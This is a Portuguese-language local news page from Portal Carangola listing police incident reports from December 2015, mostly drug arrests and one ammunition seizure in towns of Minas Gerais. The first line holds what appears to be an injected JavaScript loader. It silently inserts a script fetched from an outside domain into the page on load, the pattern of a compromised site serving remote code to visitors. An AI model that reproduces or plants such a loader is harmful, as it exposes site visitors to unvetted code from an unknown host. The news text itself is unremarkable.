;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 21/12/15 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 21/12/15

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 21/12/2015

76ª CIA PM – MURIAÉ – MG
PM PRENDE AUTORA POR USO E CONSUMO DE DROGAS EM MURIAÉ

Em 18/12/2015, por volta das 17h30min, na Rua Farmacêutico Álvaro de Castro, no Bairro da Barra, em cumprimento de mandado de busca e apreensão, militares realizaram diligências pelo local, não logrando êxito em localizar objetos objetos ilícitos. Porém, durante buscas pessoal nas pessoas que se encontravam no interior do bar, encontraram com a autora K.D.P., de 21 anos, 02 invólucros de cocaína e 01 invólucro de maconha. Diante dos fatos, foi dada voz de prisão à autora, que foi conduzida à Delegacia de Polícia.
PM EFETUA PRISÃO POR TRÁFICO DE DROGAS EM EUGENÓPOLIS

Em 20/12/2015, por volta das 14h30min, na Rua Catete, no Bairro do Catete, após informações de que R.A.C., de 37 anos, que possui um veículo Gol, estaria realizando tráfico de drogas no campo da Figueira todos os domingos em dia de jogo de futebol, militares abordaram o referido veículo conduzido pela autora, tendo como passageiros W.M.S., de 23 anos e F.J.A., de 18 anos. No automóvel foram localizados 08 papelotes de cocaína, e com a autora, 01 celular e R$ 226,00. Já no presídio feminino, durante buscas, agentes penitenciárias localizaram nas partes íntimas da autora mais 20 papelotes de cocaína. Diante dos fatos, os autores foram presos e conduzido à Delegacia de Polícia. O veículo foi removido ao pátio credenciado por falta de licenciamento.

75ª CIA PM – CARANGOLA

PM APREENDE MUNIÇÕES EM DIVINO

Em 18/12/2015, por volta das 03h00min, no Córrego Neblina, Zona Rural da cidade, denúncias davam conta de que próximo a uma boate teriam sido efetuados vários disparos de arma de fogo. Militares então compareceram ao local e em contato com o proprietário, este negou ter havido tal fato. Porém, outra denúncia dava conta de que seria a esposa do proprietário do estabelecimento, a autora dos disparos e que ela teria guardado a arma de fogo no interior da boate e as munições no mato. Durante buscas pelas imediações, lograram êxito em localizar 01 cartucho intacto de munição cal.38, o qual foi recolhido e entregue à Delegacia de Polícia.

PM PRENDE AUTORES POR TRÁFICO DE DROGAS EM DIVINO
Em 18/12/2015, por volta das 20h30min, na Rua Dourvaut de Freitas, no centro da cidade, durante patrulhamento, militares presenciaram C.F.S., de 28 anos, entregando um objeto a M.L.R., de 18 anos. Procedida busca pessoal, lograram êxito em localizar 01 bucha de maconha e 01 aparelho celular. Diante dos fatos, os autores foram presos e conduzidos à Delegacia de Polícia.
ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.